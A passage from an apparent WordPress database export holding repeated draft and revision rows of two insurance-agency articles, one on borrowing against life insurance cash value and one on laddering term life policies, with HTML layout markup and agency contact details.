beneficiaries should something happen to you.\r\n\r\nHowever, emergencies happen, so having cash value available could be a huge help in financial adversity. Before taking out a policy loan, you should gather your research and consider every angle.\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.','Can You Borrow Money From A Life Insurance Policy?','','inherit','closed','closed','','431-revision-v1','','','2023-03-21 13:45:38','2023-03-21 13:45:38','',431,'http://cmdev-site1.com/?p=434',0,'revision','',0),(435,3,'2023-03-21 13:47:01','2023-03-21 13:47:01','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Mike Elman</span></div>\r\n<div class=\"article_info_bottom_line\"><span style=\"color: #ffffff;\">-</span></div>\r\n<h3>Borrowing Money from a Life Insurance Policy</h3>\r\nThough the primary focus of life insurance is to provide a benefit to the family of a lost loved one, some policies could add enhancements to a financial portfolio.\r\n\r\nIf you are familiar with life insurance, you may know the term “cash value,” or the ability to borrow from a policy if you have paid a certain amount of premiums.\r\n\r\nThis could be a temporary solution to financial emergencies, but it should require great consideration beforehand so you don’t put your investment at risk.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Can You Borrow Money From a Life Insurance Policy?</h3>\r\nNot all life insurance policies build cash value, such as a term life policy. Term life insurance rates are typically less expensive than whole life and offer just the death benefit, no cash value.\r\n\r\nHowever, a whole life or universal life insurance policy may offer a cash value benefit, which may allow you to take out a policy loan.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What are the Advantages and Disadvantages of a Policy</h3>\r\nBefore you jump in and take a loan out against a policy, consider if taking funds from your life insurance policy makes sense for your situation. In addition to weighing the pros and cons below, speak with your insurance company about how taking out a loan will impact your policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Advantages:</h4>\r\n<ul>\r\n 	<li>No lengthy application process like other loans</li>\r\n 	<li>If you have built up cash value, you can borrow without a credit check</li>\r\n 	<li>Policy reports do not show up on your credit report unlike other loans</li>\r\n 	<li>Policy loans typically have lower interest rates</li>\r\n 	<li>Repay the loan on a schedule you set</li>\r\n 	<li>You can choose not to repay the loan and just deduct the amount due from the beneficiary’s benefit\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h4>Disadvantages:</h4>\r\n<ul>\r\n 	<li>Must have cash value built up which may take years from the policy start date</li>\r\n 	<li>Risk a reduced death benefit for your beneficiary if the loan is not repaid</li>\r\n 	<li>Risk losing your policy if the interest and unpaid loan amount total more than the remaining cash value\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>How Does a Policy Loan Work?</h3>\r\nWhen you borrow against your cash value from a life insurance policy, the insurance company uses the benefit as collateral.\r\n\r\nIn other words, if you pay back the loan plus interest in full, your policy benefit will go back to the original amount you bought it for.\r\n\r\nHowever, if you do not pay it back, the company will deduct the loan amount plus interest from the policy benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>When Can You Take Out a Policy Loan?</h3>\r\nYou must build up the cash value before you can take out the money. Contact your life insurance representative and they will be able to tell you what your cash value is. You should also discuss how taking out the loan will impact your policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Should I Consider When Taking Out a Policy Loan?</h3>\r\nIf you do not want to jeopardize your life insurance policy, consider the following when taking out a loan.\r\n<ul>\r\n 	<li>How will taking out this loan impact my life insurance policy? Will I put my beneficiary’s death benefit at risk?</li>\r\n 	<li>Aside from the interest, are there any other fees or costs I need to know about?</li>\r\n 	<li>I should create a mock budget and schedule on how I will pay the loan back to ensure this is feasible.</li>\r\n</ul>\r\nBorrowing from a life insurance policy should be treated the same as taking out a loan from the bank – with due diligence.\r\n\r\nIt is important to remember the primary reason for a life insurance policy is to take care of your beneficiaries should something happen to you.\r\n\r\nHowever, emergencies happen, so having cash value available could be a huge help in financial adversity. Before taking out a policy loan, you should gather your research and consider every angle.\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.','Can You Borrow Money From A Life Insurance Policy?','','inherit','closed','closed','','431-revision-v1','','','2023-03-21 13:47:01','2023-03-21 13:47:01','',431,'http://cmdev-site1.com/?p=435',0,'revision','',0),(436,3,'2023-03-21 14:21:05','0000-00-00 00:00:00','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality, and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<p style=\"padding-left: 320px;\">• $500,000 for his mortgage with 10 years left\r\n• $300,000 for his two children’s college expenses ($150,000 each)\r\n• $200,000 in the event of his death so Terri will be taken care of</p>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" />\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<strong>When Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.</strong>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\nTerm life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Termlifeadvice.com, 2018\r\n</span></em><em><span style=\"font-size: 8pt;\">2. NerdWallet, 2017</span></em>\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','draft','open','open','','','','','2023-03-21 14:21:05','2023-03-21 14:21:05','',0,'http://cmdev-site1.com/?p=436',0,'post','',0),(437,3,'2023-03-21 14:02:12','2023-03-21 14:02:12','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<div><img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"400\" />Larry is looking into life insurance and needs:\r\n<ul>\r\n 	<li>$500,000 for his mortgage with 10 years left</li>\r\n 	<li>$300,000 for his two children’s college expenses ($150,000 each)</li>\r\n 	<li>$200,000 in the event of his death so Terri will be taken care of</li>\r\n</ul>\r\n&nbsp;\r\n<div>-</div>\r\n<div>-</div>\r\n<div>-</div>\r\n<div>-</div>\r\n<div>-</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" />We encourage Larry to layer three term life policies as shown below:\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n&nbsp;\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n-\r\n\r\n-\r\n\r\n-\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:02:12','2023-03-21 14:02:12','',436,'http://cmdev-site1.com/?p=437',0,'revision','',0),(438,3,'2023-03-21 14:05:22','2023-03-21 14:05:22','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"400\" />Larry is looking into life insurance and needs:\r\n<ul>\r\n 	<li>$500,000 for his mortgage with 10 years left</li>\r\n 	<li>$300,000 for his two children’s college expenses ($150,000 each)</li>\r\n 	<li>$200,000 in the event of his death so Terri will be taken care of</li>\r\n</ul>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" />We encourage Larry to layer three term life policies as shown below:\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:05:22','2023-03-21 14:05:22','',436,'http://cmdev-site1.com/?p=438',0,'revision','',0),(440,3,'2023-03-21 14:09:31','2023-03-21 14:09:31','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<ul>\r\n 	<li style=\"list-style-type: none;\">\r\n<ul>\r\n 	<li>$500,000 for his mortgage with 10 years left</li>\r\n 	<li>$300,000 for his two children’s college expenses ($150,000 each)</li>\r\n 	<li>$200,000 in the event of his death so Terri will be taken care of</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" /><strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:09:31','2023-03-21 14:09:31','',436,'http://cmdev-site1.com/?p=440',0,'revision','',0),(439,3,'2023-03-21 14:08:45','2023-03-21 14:08:45','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: 